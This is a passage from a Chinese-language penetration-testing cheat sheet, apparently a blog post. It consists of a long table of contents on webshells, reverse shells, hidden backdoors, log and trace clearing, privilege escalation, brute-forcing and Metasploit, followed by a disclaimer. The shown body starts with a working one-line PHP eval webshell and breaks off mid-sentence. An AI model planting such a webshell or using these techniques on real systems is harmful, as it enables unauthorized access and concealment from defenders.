目錄

windows

php一句話木馬

日志清理

DOS命令

查看用戶的SID

最高權限

常見的cmd命令

反彈shell

PHPMYadmin

mysql注入語句

wmic

linux

crontab創建隱藏后門

linux日志文件

knockd服務

ssh登錄

ssh隧道

本地轉發

遠程轉發

動態轉發

/proc：

Centos 8 更新 yum 源

痕跡清理技巧

隱身ssh登錄系統

docker

設置倉庫

Docker 更換國內鏡像源

密碼信息

內核提權

查看發行版

查看內核版本

一句話添加用戶

獲取臨時shell

設置受限制shell

繞過受限的shell

可提權文件

輔助提權工具

git提權

清理磁盤

df

du

查看可執行的命令

系統信息

查看系統是32位還是64位

查看內核信息

查看開機啟動

計劃任務

特殊權限

環境變量

查看ssh日志信息

查找特殊權限賬號（默認root）

查找可以登錄ssh的賬號

查看正在連接的ssh sessions

抓包

teehee提權

find

提權

按權限查找

按所有者查找

按時間查找

按大小查找文件

grep

mysql暴力破解

查看登錄錯誤的用戶名

查看登錄錯誤用戶名及ip登錄次數

kali

crunch

john破解zip加密文件

nmap

常用

腳本掃描

hydra

ssh:22

Ftp:21

https

smb

rdp:3389

pop3

sqlmap

Access注入

MySQL數據庫注入

Cookie注入

POST表單注入

繞過WAF防火墻

meterpreter

端口轉發

設置監聽

亂碼

常用基本系統命令

文件命令

獲取系統信息

用戶界面

權限

hashdump

利用

內網滲透

維持訪問（種植后門）

第三種shift后門

常用

msf

msfvenom

WMAP(輕量級測試工具,檢測常見的Web漏洞)

NDProxy內核提權

---

免責聲明

文章僅做經驗分享用途，切勿當真，未授權的攻擊屬于非法行為！利用本文章所提供的信息而造成的任何直接或者間接的后果及損失，均由使用者本人負責，作者不為此承擔任何責任，一旦造成后果請自行承擔！！！

windows

php一句話木馬

<?php eval(@$_POST['a']);?>
<?php eval(@$_GET['a']);?>
其中eval